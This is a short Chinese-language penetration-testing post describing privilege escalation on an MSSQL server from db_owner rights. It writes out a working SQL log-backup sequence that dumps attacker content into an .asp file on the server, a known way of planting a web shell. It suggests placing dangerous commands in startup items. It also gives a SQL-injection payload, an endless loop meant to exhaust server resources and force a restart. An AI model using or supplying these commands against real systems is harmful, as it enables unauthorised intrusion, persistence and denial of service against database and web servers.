在我某次的渗透工作中遇见的一个小问题,其权限设置时非常BT,只能在当前的目录下转悠,调用cmdshell可想而知,一般的尝试方法都将失去效应,但是它的数据库确是MSSQL,权限应该不会太高SrvRoleMember : db_owner果然,经过查看之后发现时db_owner权限,其实大多数朋友能走到这里说明您还有足够的思路分析能力,那么我们就可以进行我们的日志备份提权操作了,对于这方面了解不太明白的可以看看如下的解释:SQL中含有LogBackup的功能,我们可以通过调用它执行如下命令create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('www.tosec.cn');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backuplog @b to disk=@t with init,no_truncate;drop table [bin_cmd];意思是备份我们的网址到E盘下的1.asp文件中,当然我们通过这个调用可以备份一些危险指令到系统启动项中,这样就达到了提权的一些操作我们继续在提权中发现需要等待管理员的登录或者重启操作,但是可能管理员很久都不会登陆,当然我们只能使用一些非常手段,这里提到的不是ddos,而是数据库负载。对,我们需要的是加大数据库负载,当然也需要一定的条件,就是我们需要一个注入点或者能执行SQL命令的地方(;wHiLe 1<9 bEgIn sElEcT cHaR(0) eNd--),我们执行括号中的命令就可以了,意思是将范围中的数值进行转换,一直到服务器资源耗尽,当然如果管理员在这方面做了限制那么就无法起到效果了,例如:ASP的执行时间。
来源:网络
